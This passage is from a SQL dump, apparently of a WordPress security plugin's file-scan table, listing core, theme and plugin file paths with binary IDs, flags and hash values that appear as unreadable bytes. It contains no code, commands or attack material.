T@��nyȳ�^a�u��\'','',0,'?'),('��x>J��Z�$��(�','wp-content/themes/mora/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�A�$c\\��,�u��R7','2�(���d��jֆbE�4Հ��x;�ߥ|','',0,'?'),('��^�\"�uyQS�','wp-content/themes/wp-barrister/library/js/imagesloaded.pkgd.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ٙ$�ҿ��¨��','0@$��DvNln%?~`�\nK�����\0�','',0,'?'),('�,�{�vF��ߝ��','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z9գ��#����@�r��','K��uBi!�K�V�\0zW���=U�B 2�','',0,'?'),('�2X69G3�\Z�+}A�6','wp-content/plugins/wordfence/views/waf/option-whitelist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@7���#{X��q��','J���n�������Pq��/�\Z�n\n��l�V','',0,'?'),('�5����\r��k��','wp-admin/js/color-picker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����zhg\0~���','=k�jY�8�8r�a���hI�:Rի9��i��É','',0,'?'),('�8�������P5aĨ� ','wp-includes/images/smilies/icon_wink.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e?2���i����','�(���V��{�V�Bk����o(`Z��V 6','',0,'?'),('�B�h\Z����n.]=','wp-includes/wp-includes/js/wp-custom-header.min.js',0,'KO��x �3��y;9�','KO��x �3��y;9�','��X$A���\r\"N��e�$ߦ��+���L(','',0,'?'),('�P#x$��5���>y��','wp-content/themes/capacious/inc/customizer/capacious-layout-design-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]qZ��(\n����','��\0+�s)�pּ�������~F�\"0zf','',0,'?'),('�ma\Z�9�+~�ȍ��q','wp-includes/wp-includes/random_compat/random.php',0,'�5&}k���!6�$�','�5&}k���!6�$�','X8�P���_9���kQ�a[��-mS\'<�@�!V:','',0,'?'),('�����y85���æb�','wp-admin/css/colors/sunrise/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z��t��b傽�','�]�\0�mXٕ���Ç?���L�d�rHyʧ','',0,'?'),('����H |(#`�S5sAi','wp-content/themes/sg-window/genericons/genericons/Genericons.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�=³zeX*�|��b','Ä@��Pw*\'�0M�\'D�c�1��ח�d��','',0,'?'),('��l�3. XN�','wp-includes/Requests/Exception/HTTP/403.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`�\r�o��k3��1�','�I�l�E�K�Ѧ��?Z�0JT�����U�','',0,'?'),('��>��t�ːXA\\�','wp-content/themes/vision-lite/images/mobile_nav_right.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I����Y#��&٩O','/E��tX`6�G�>�EPx>�k�[�E���','',0,'?'),('��\"~I��E�\rD�@','wp-includes/wp-includes/js/plupload/plupload.js',0,'ݠ�$pZR�>\'�|�','ݠ�$pZR�>\'�|�','�\"����8[J%�.�˚�c�V\r\rE��)\'','',0,'?'),('���ڣ�Hq�<m��','wp-content/themes/capacious/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�-��pP��Iz|qt�','���uO=r�Zj%WX(��Тj0����ݳ5�)','',0,'?'),('��{�1u�.b}κ0$�','wp-content/plugins/wp-cerber/assets/flags/bi.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',|��\\_��27�k�� ','v����JȢ�\"DWK�9q �Q�^F%a�A','',0,'?'),('�ƻ�K���c��;{','wp-content/themes/promote/inc/kirki/includes/field/class-kirki-field-dimension.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l���������`2�','s��ȋx��ǫ�pL�>��E �*j�9��*fE','',0,'?'),('���lf1ku߇�\r�\'','wp-content/themes/promote/inc/kirki/assets/images/1c.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ʦ�e3�U�k�$','�ː)��͑`�Pb��L����E��C���','',0,'?'),('���$��>P���3�V�','wp-includes/wp-includes/js/dist/a11y.min.js',0,'婯�S\Z�`�!`TLu','婯�S\Z�`�!`TLu','ʢ����Α%��d5F�(�VW��1�V|\"u99','',0,'?'),('����PQ�E|E}7+','wp-admin/includes/class-wp-filesystem-ftpsockets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�/CO\Z>yCiϼ�2�','�9�{��pZ�I�͖��w[Y��.2�l�7��','',0,'?'),('����J�/�:ou��','wp-content/themes/promote/inc/kirki/includes/class-kirki-values.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K��؆�����չ�','P_=&߁���X�Z�ۉ���D��3�i���KM%','',0,'?'),('��U���$�\\*�1^�S�','wp-includes/js/jquery/ui/effect-clip.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G��=�����:� s','��tw�:��o,�u3Mxm���x�H ��gC��','',0,'?'),('����3%;|Z�fz�p','wp-content/themes/hueman/option-tree/includes/ot-functions-option-types.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�A�������a��j�','�PK�<��vnq��.�P����C�+����-','',0,'?'),('������ە��v�)�','wp-includes/wp-includes/js/dist/components.min.js',0,'�)��[Ŕ��^�2��','�)��[Ŕ��^�2��','��v�,�$.����b��߲���^�#n1�c�,','',0,'?'),('����P�J�t��1z','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��wU ��ې6M�\\�8','<����\0�\rIB=\"�P8D�\"�����L~�I[','',0,'?'),('����_�� �\0*�O','wp-includes/rest-api/endpoints/class-wp-rest-site-health-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u��u��tu�+]�a','�\n�1�IJ��A��P3����C\0{K7QO��f�','',0,'?'),('���YL.t�����4','wp-content/themes/cactus/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ďX��y�ذOH��','7�FĘ��d@ĕY�5L�C�Vs���eP<. �֍','',0,'?'),('��P\Z��/���l%�','wp-includes/js/jquery/jquery.hotkeys.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��hI�QLZA$Un�H�','��T����f�RMS�9º��MDR��R��N�','',0,'?'),('�\0� ��k~��U5T','wp-includes/widgets/class-wp-widget-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��;���\r9!�5�P�','Y����7%��Z�Gݠ\Z��ӊr�cI�ϸ','',0,'?'),('��i�L�ƾ�<k��','wp-includes/wp-includes/images/smilies/rolleyes.png',0,' ���O�2�Ofݣi�',' ���O�2�Ofݣi�','fK�)�\n�d��!]\r)��\\}���זl�^��','',0,'?'),('��!j}=�/��߭','wp-content/themes/storeone/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w�#U��̘5�^�l�','��Ç�^��*uM,/�z�_,�53��1�ƃ','',0,'?'),('� J.�\'��Vn{�|�T�','wp-content/plugins/wp-cerber/assets/bgwidget.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PM6ev����3���','��F.�F��3��r5�e�*\rl��������3\r','',0,'?'),('�\n%f[!aE�r�tg�i','wp-includes/images/media/video.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����u�h����q��','DBU����MiO�b�,���e��=��W�{���','',0,'?'),('�Y�B!���$���','wp-content/themes/spidermag/spidermag/customwidget/widget-tabbed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������r~3cx��`','�D�HMy�0�,};θz6/��7���@2&�','',0,'?'),('��f9@��H4/�\Z�','wp-content/themes/spidermag/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>۳���`�W','��z~H4�;�iʽ�eտ�� �-ą�','',0,'?'),('�ϱ����DZ^`�','wp-content/themes/cactus/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WYC�E�Kwp��ў5','�B�a��?���Xw����p���y����~���','',0,'?'),('�&�S짿o�$�0�n','wp-includes/author-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','©ei+`љ�[��>q','kt0���6�;��^@�ê��R Β�6�9r߯','',0,'?'),('�\'P��T]� �6�~�','wp-content/plugins/akismet/_inc/img/logo-full-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^K��-^��>A�s{�','�%>��:1��W��R����ͩ��Q�i��~�^G','',0,'?'),('�1v!�������','wp-content/themes/weblog/acmethemes/hooks/navigation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Y�e��f���J&�[','���j��*y�~~]p鯀1d/������','',0,'?'),('�@㸧*��h;y��O\"','wp-content/themes/anima/resources/images/demo/10.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7^�\"J�?�(�^��','��=v���$��py��f�������Ҙڶ�]�','',0,'?'),('�A%��s8��a��ڣ��','wp-includes/wp-includes/js/comment-reply.js',0,'�F���D6����x�','�F���D6����x�','!�x��G�����Go�Df�B8xXC�','',0,'?'),('�E�ܦ ����O���','wp-includes/wp-includes/IXR/class-IXR-base64.php',0,'�*6���D�T�e��','�*6���D�T�e��','?F]L�2}���\rS�@b�2�O�o�uU\'O��','',0,'?'),('�G�|$p֠+(�','wp-admin/js/tags-box.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9W�`��(P�E쐷','�������}�;R)_�J7���*��?���[','',0,'?'),('�H��ɪ\Z4��ͻ','wp-content/plugins/wp-cerber/assets/flags/cl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�Q�a�A�ߜ����',' I���ײ|01aK�ը�r%բ�(ظlR�','',0,'?'),('�Q����ԁ�2�7u�L','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1���3y����1��',' }��N� <�v���B�S%�s\\���S�','',0,'?'),('�R��B�p��m�Z�;','wp-includes/css/dist/block-editor/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��vm �\0�����','H�8��2���8��f��U��Tn���A �','',0,'?'),('�y�Hz��\"�\\����','wp-content/plugins/wp-cerber/assets/flags/tl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y�/`�3˸:��Ldlj','q\0HP��+���m �l�K��(��H�','',0,'?'),('�z��m\Z�.�벿�\0\Z','wp-content/themes/Kent/FT/options/options.php',0,'��WI�[��j(�]�9�7','��WI�[��j(�]�9�7','��Y���ۋ��������@`^;&X','',0,'?'),('�o�j����y��V','wp-content/plugins/wordfence/lib/menu_tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gԌ�p�P�Ig[=��','�V���!�ޟ��ƚ_z�=�|�yaX�ȏ�','',0,'?'),('��Ca�s�]��n�/��','wp-includes/css/dist/block-library/theme-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����a�,U���ʑ�','��܉�)�\0I]�7h�S��l�(�B\n}kw�a','',0,'?'),('��Ѻ�\"�P5��^U�\Zi','wp-admin/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���J� Ki\Zb+GZ��B','\r9�cgfĊ�T�v��S(�9IE�$�pH��','',0,'?'),('����;M={��p���','wp-content/themes/vision-lite/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','` CÊ�A@����`�','�\'�\\�o4���o�|4I,@ J�O����Ћ�','',0,'?'),('���8h�YX�O./0�I2','wp-content/themes/advance/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=e�\'<�<�����K5','�#!O���q�$���&�x�ʸ�k3��','',0,'?'),('����h|�d7��k�Nn','wp-includes/wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php',0,'\"<8���.���K�\'','\"<8���.���K�\'',' \ZYӵ�˼*�,Q�L�Y{�㬣p�\r�h���','',0,'?'),('��m���z4�L��K','wp-admin/images/xit.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� 3X�ī9+�6n~','�� s������ۨ��S,md�\\Yb�Ƈ��o','',0,'?'),('����A�G,��<���','wp-includes/js/jquery/ui/effect-fade.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���*Bz��L��','�j�fD�G��=c�Fs㏽���~�쉹X','',0,'?'),('����:��C��E<','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-upload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Әȵ �_8�Q3��','�u3{#\'r=MY,��k��ڎ\0��R�tY��','',0,'?'),('��>(���훸Ħ�%ٗ','wp-content/themes/anima/cryout/prototypes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y���;*�iJ~�c(','RnH����ۀ�5�2���I�g�sۇ�{��k','',0,'?'),('���ɵW>_��u꯹A','wp-content/themes/advance/js/welcome-page.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�Q�.%$�қ��t�','�\\��Lp��{\"�Ν����It-�#�{���|�','',0,'?'),('����n\0D,����;R','wp-content/plugins/wordfence/js/jquery.dataTables.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<\\�� �͕�h�','v�Ao;�uD�3$�WB95�_\"��� �','',0,'?'),('���C�ez���q�x','wp-includes/wp-includes/css/admin-bar-rtl.css',0,'����r���ju','����r���ju',',t�c* 2�����3ئI����4�j','',0,'?'),('��6�Sqc��H��)','wp-includes/wp-includes/js/jquery/ui/selectable.min.js',0,'�ZIr��]-�4��','�ZIr��]-�4��','�]���+�R��s���z�lC�a���(8��','',0,'?'),('����ؙ�3���','wp-includes/wp-includes/js/masonry.min.js',0,';?�&��T�Je�xH',';?�&��T�Je�xH','$��!�|=#f�c�jc���:��T�Q0b�,ʉ�','',0,'?'),('�Lor!Vt�y��4�','wp-content/themes/newsmag/inc/admin/welcome-screen/sections/support.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�-�\r���[.R�','z��]�q��\'�y�E�����z���~��','',0,'?'),('�����հ ̋�Ȳ�S','wp-content/plugins/wordfence/views/scanner/scan-progress-detailed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:�Ƚ� ����\\E','��\\� ����O��JpF�>Q�� �?��lgi���.','',0,'?'),('�S��.n\n1&�B��#,','wp-content/themes/newsmag/assets/vendors/machothemes/machothemes.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��cG�E��AŨأ�','Iz�!�ɧ�I�\'�-+�A�\Z��`y����~~�','',0,'?'),('���6��I��N�','wp-content/themes/promote/inc/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(n���^�^�:��','7�.>p���\\i�YB�N��p�Ӻ��k��]k','',0,'?'),('� �n�$��q��^qf��','wp-includes/images/smilies/icon_lol.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n����:ѷ&����(�','�l�1�Hq�.�2�x��$�Y�\Z8�','',0,'?'),('�\'^�D��IG�1��!','wp-includes/ms-site.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ظ;�#�t��r�/+0','J�c�CBE�䱢?$Gq�u,7��ޚ�A�','',0,'?'),('�*T�u\r�����~�m','wp-admin/css/colors/ocean/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v0O��,�ᤴX��','찐p\\B�lI����`�{i�~����&QO','',0,'?'),('�1l<� t~L�Uw�','wp-includes/class-wp-locale.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�P�<�#��\0�\':','�D��n]����AW�EH�O�H�@�hAD}','',0,'?'),('�E-j��1j��\r�E�','wp-includes/registration-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q<۾\Z7�M�v��','Kd���_�MF� X��X�.,\'T\\��6���6','',0,'?'),('�Y��!��Y�Y�','wp-content/themes/maxbusiness/inc/menu-walker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t�u���L\0X\\?\r�d','W����Z�p�\" ^&#nm��\'a��X�U�v','',0,'?'),('�[���d�m{&oL!Τ','wp-includes/wp-includes/js/tinymce/plugins/textcolor/plugin.min.js',0,'��v�<h������p�','��v�<h������p�','!�/�[I�+\r��G���� Dխ�7�=�����\'','',0,'?'),('�]oM�se��J4�','wp-content/plugins/wordfence/views/dashboard/options-group-view-customization.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o���h5��\rxܖN','6y\Zu�υ;� �0�~�rs1J�9��X���J���','',0,'?'),('�]�m��5{�)��k','wp-content/themes/hueman/assets/front/img/demo/6-320x320.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Anτ�$��Q���I','�� �=�-}(�����P����Q�b','',0,'?'),('�_>?<+ן��Ĵ���','wp-content/themes/storeone/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VP{�~��m�r!mUjG','y�77Y�����$��d�[�<(��3�K.�Q�','',0,'?'),('�f ��r�p�(��p�$�','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_555555_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��bD�@p�G+��','*DZ�>�Bg�&Y�Y������4(<�/','',0,'?'),('�g�K�;�qF�VI}�Q�','wp-includes/Requests/Exception/HTTP/416.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�N9�ɪ�a�Dx�','�(��mybV�aI�jWp���(!A����<(�X','',0,'?'),('�ir�u�5������','wp-content/themes/twentytwenty/assets/js/index.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,`��Ќe�dÉd','���*o��z@\n��g�cR��9%�GY�`(J0','',0,'?'),('�|N�ݾfo��e4b`>�','wp-includes/wp-includes/js/jquery/jquery-migrate.min.js',0,'y��k~�x�$K^-3�}','y��k~�x�$K^-3�}','��P�y���D\\\\�cd�~��P���`7 �F/','',0,'?'),('�ܴB�E���%�a6Z','wp-content/themes/advance/inc/admin/img/2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~��J�x4NEB','�Z���tס�NS2\r8����b�]p��\n','',0,'?'),('�������<�x�B�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/waf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���xqE̜$�b0^�s','T\0>�t�d��ը&\Z4qɢ���A :�C�C��Q','',0,'?'),('��ΩQtn϶^iҚ�','wp-content/themes/skt-pathway/images/h1_buy_bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�<K\n�>��y','[�{�ƴZ�����ć�\'�E���k�7�','',0,'?'),('��e�-��Rȉ���L:�','wp-content/plugins/wordfence/lib/rest-api/wfRESTConfigController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"�Z��O�;�m�#�','�v�̀��O��=��n��u�#�}��զ`�4�W�','',0,'?'),('���8���ՠ�)j,z','wp-content/themes/twentynineteen/sass/site/primary/_posts-and-pages.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HB-���L\'�g�Aq','vɘ(�f]A��?p�AR\Za��Ɓ& A9\r[��2','',0,'?'),('���`��Is��^.A','wp-includes/wp-includes/images/media/spreadsheet.png',0,'�4���\0T��̇?�','�4���\0T��̇?�','����v��)�\n�6Zl��2���В1�!+ �','',0,'?'),('���h���x��%~\0�','wp-content/themes/hueman/assets/front/js/_parts/_main_userxp.part.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>�����?5�8�pJ','�\"1V����^�� k5e�:\03�L/��','',0,'?'),('��6D�:|g�(�\\FL�','wp-content/themes/sg-window/content-jetpack-portfolio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'>�U�>s�h���','�x��톕��Dn O���s�j�9)��0�k$\r','',0,'?'),('��p?E^�@�\'��PE�','wp-admin/edit-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')��L�(�`��#��','W~T+��$��zgbl�ء\'���p3��m�1','',0,'?'),('��>i�>C�.�|#�q','wp-content/themes/twentytwenty/classes/class-twentytwenty-walker-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���4�k�q¸�f&','<S�H>�x�Ɂ����9�|f2�Qν���mF','',0,'?'),('������U�\\��a�E','wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w��ͱ��r0��=�','?E�%��+�����w�\r�^�֗.$�i�$[W','',0,'?'),('���i��֯1�o�R!','wp-content/plugins/wp-cerber/assets/flags/fm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=KbF�!X�ټh[�(@','/�������_S��L��`ZI�I(1���','',0,'?'),('�-4ͧb�Q?�)\n�','wp-includes/wp-includes/blocks/pullquote/block.json',0,'\r�1��ݗz��sK�c','\r�1��ݗz��sK�c','v�K�N��`\ZX�n$`7P��Y6�~ON�1�','',0,'?'),('�B����!��vݡɶ','wp-content/plugins/wordfence/views/onboarding/banner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zz�#uv��\0���','��}���|IR�v�J�%-�/\n�V���','',0,'?'),('�)����zg_�ӻ��=','wp-content/themes/storeone/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_���sc���k�=�','g�#ZGqüW�k*B���\'�B�T��ޣa��','',0,'?'),('�+�i�p�ZӶtB','wp-content/themes/twentytwentyone/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"��rA�_�ù�_9','�ޔ�<N�6����o8���\r�����$i','',0,'?'),('�;��:Չ5��a��-�','wp-content/themes/advance/images/shadow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u����R�� �)(','3�ſ�јb#�w�R�@�&{��Jd��lĻ','',0,'?'),('�<��(��*A]�O�','wp-admin/css/colors/ocean/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','35\"�e4��9��,<?','n)(�Q�hA`�[��汶<�J��t({��dـ','',0,'?'),('�D��d.P˴{-yo�g','wp-content/plugins/wordfence/views/common/status-warning.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�f�uֺg-g\0C�=v','�N<\r�;��d�*��8+)�\ZbO?�0��E���','',0,'?'),('�D�=8��^n+�Г�$[','wp-content/themes/advance/inc/kirki/assets/scss/controls/color.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n����|�C�','JG*��r\0�df� >}�����\\�^��N','',0,'?'),('�F�:�Vaf�I͉@�k','wp-content/themes/auberge/template-parts/content-featured-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M��<������}�','���ȷOw-\"�$�Y��jn>�)���u�B','',0,'?'),('�I|�K9�(�{s�X','wp-content/plugins/wordfence/lib/menu_scanner_credentials.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}����\0���\Z�̿�','|�?b~����ڬ��(�ʹ;l�G9��','',0,'?'),('�N\"�,�_� 3���B�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-misc-options-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��P�B���4�H','i�썚<X�\'hw�4E�u�*\\���xQ��7�','',0,'?'),('�a�ͮ�(�o��:`','wp-content/plugins/wp-cerber/assets/flags/dm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��e�<�-�.��w','��h*W̕|l�0jhWp:���z��[V,','',0,'?'),('�bv��E��H���΄','wp-includes/js/wp-lists.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M4���KYs:��ȫ�','����Z-3w�Eї\rqK]��3�]��.X','',0,'?'),('�hS����:���`','wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�+C#+|�fZ���]�','kn\Zy�&��_��[��Igl�(�g\'�^�G','',0,'?'),('�l�f���tQ���','wp-content/themes/skt-pathway/images/free-vs-pro.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O^ơ1\r�Qs%�\n��','�t��p�Sx�\0us�fO셝��`�Ö','',0,'?'),('�o��M��F�7���','wp-includes/wp-includes/js/dist/reusable-blocks.min.js',0,'�,�F疋��nA�^','�,�F疋��nA�^','�KJE(iLõN��5���KTc�B0$]�-}�۹','',0,'?'),('�s�U\nM�t�mH|Ҭ�','wp-includes/wp-includes/class-wp-locale.php',0,'�S�P�<�#��\0�\':','�S�P�<�#��\0�\':','�D��n]����AW�EH�O�H�@�hAD}','',0,'?'),('�a�J�,�Hb��lQ>','wp-content/themes/weblog/template-parts/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\��������','-Rx�v�W��$z�3�9F`�G#�wr-V,���F','',0,'?'),('��(_x\r����1��','wp-content/themes/advance/images/sep-shadow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&�0Qһ��:4,��','~4�\\-��;1ĩ\0�)A��H㗽dp\\�','',0,'?'),('���5ȇj����4*H','wp-content/themes/newsmag/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_��\\���$[���?��','E6�����vo�]���բ����<��J����','',0,'?'),('��N�1$y�\ZJ+�t��','wp-includes/wp-includes/SimplePie/Cache/File.php',0,'P��8?Q��h�','P��8?Q��h�','~�`��嫌�<��B\n鲙%]��X}\Zi��','',0,'?'),('���>˓�;�ͷ�;xB�','wp-content/themes/advance/inc/kirki/assets/scss/panels/expanded.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��yj��w��J:J|��','�B�2��锳§�lyk(��G����','',0,'?'),('���������z�P|J|','wp-content/themes/maxbusiness/template-parts/home-slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�U�2[�*��醪','� {�rr$��a�;!+,E��C\'a�˃ӎ4�','',0,'?'),('����lzPw{e','wp-content/themes/advance/inc/kirki/assets/scss/controls/dimension.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ٗ@ȡU�6��<�','%�\'���v�u���[�� ʁ����#��i=�','',0,'?'),('���c�l�\\���5e','wp-content/themes/hueman/functions/czr/controls/class-layout-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� �FNT��т� �','�X���@���p6�gZ�P�x� $�gP�����','',0,'?'),('������n@���+�\"�','wp-includes/wp-includes/js/customize-selective-refresh.js',0,'�uP岉�0x\Z�����','�uP岉�0x\Z�����','��q�˖jZC~����<sħ+�RI!�H��','',0,'?'),('����ZD��F��7vp','wp-includes/wp-includes/js/shortcode.min.js',0,'�Ad�\'w#6?��w�','�Ad�\'w#6?��w�','�����Q� 9I��o��T-�79_!���`','',0,'?'),('��˜���MX)�o��','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-url.min.js',0,'rt\0X��d�xR`��','rt\0X��d�xR`��','��b�ՔW�?��gtRċ\\}�D�E�TӇ��=','',0,'?'),('�������8�Zҹ$�','wp-content/themes/hueman/assets/czr/js/czr-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r��|����H\Z��u��','����ӄ~a��(b��/E�/+��FX�a����','',0,'?'),('���&��N�,���6P','wp-admin/images/icons32-vs-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*04�G4F� &Z�i}\"','�.a�}��hw�6�WEʭ�(3�Jӭ�9�E�','',0,'?'),('�д��\0N莦v�\n=t','wp-content/plugins/wp-cerber/assets/flags/cz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cR��}S������J�','�m*1\"�vl�ř:\\��f����?.�؟i��\0�','',0,'?'),('�ٯx�������n�b�','wp-content/themes/wp-barrister/content-aside.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ڷ�sV\".���@(��','�Y���EX_�m�y�d��ٛs�d���W_�','',0,'?'),('��v��#q���ȃ�','wp-includes/sodium_compat/src/Core32/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EOxٕX�2떭','x��aJN�!e���\"\"Nq�}�AMC�1)��{�j','',0,'?'),('��t�\r�Q7��vLj��','wp-content/themes/skt-pathway/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�oW�v�g\n8�Fӕ\"','{ܭ/����&���\Z��=�l�d;q����>w','',0,'?'),('��W31��N���gפ��','wp-includes/js/dist/vendor/react.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jB���e�}����\"\Z','�g��+_u<!�\'��[��N�b�r��c�>;','',0,'?'